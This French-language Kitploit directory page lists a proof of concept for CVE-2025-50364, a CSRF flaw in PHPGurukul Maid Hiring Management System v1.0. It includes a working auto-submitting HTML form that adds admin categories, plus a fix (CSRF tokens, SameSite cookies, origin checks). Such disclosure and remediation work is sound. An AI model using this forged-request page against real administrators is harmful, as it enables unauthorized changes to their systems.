Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Preuve de concept d'exploitation CSRF ciblant CVE-2025-50364 dans PHPGurukul Maid Hiring Management System v1.0 qui ajoute des catégories administrateur arbitraires via un formulaire HTML conçu à cet effet. | Kitploit
Outils/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Preuve de concept d'exploitation CSRF ciblant CVE-2025-50364 dans PHPGurukul Maid Hiring Management System v1.0 qui ajoute des catégories administrateur arbitraires via un formulaire HTML conçu à cet effet.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Nom du projet et URL du dépôt : Système de gestion d'embauche de domestiques utilisant PHP et MySQL

Type de vulnérabilité : Falsification de requête côté client

Version(s) concernée(s) : v1.0

💣Description de la vulnérabilité : Une vulnérabilité de type Cross-Site Request Forgery (CSRF) existe dans le panneau d'administration du système de gestion d'embauche de PHPGurukul, permettant à un attaquant d'ajouter des catégories d'embauche arbitraires en trompant un administrateur authentifié pour qu'il visite un site malveillant. Cela peut entraîner une pollution des données et des modifications non autorisées au niveau administrateur.

👩‍💻Impact : Création non autorisée de catégories

🛜Preuve de concept (PoC) 1)Il existait une fonctionnalité d'ajout de catégorie où seul un administrateur authentifié pouvait ajouter une catégorie. 1 2)Code HTML pour envoyer une requête POST au point de terminaison /admin/add-category.php CSRF-POC 2

root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3)Utilisez le code HTML et créez une URL malveillante. 3 4)Après que l'administrateur a cliqué sur le lien, une nouvelle catégorie sera ajoutée. 4 5

Recommandation : Implémentez des jetons CSRF dans les formulaires d'administration, imposez les cookies SameSite et validez l'origine de la requête pour empêcher les actions non autorisées.

Télécharger l’outil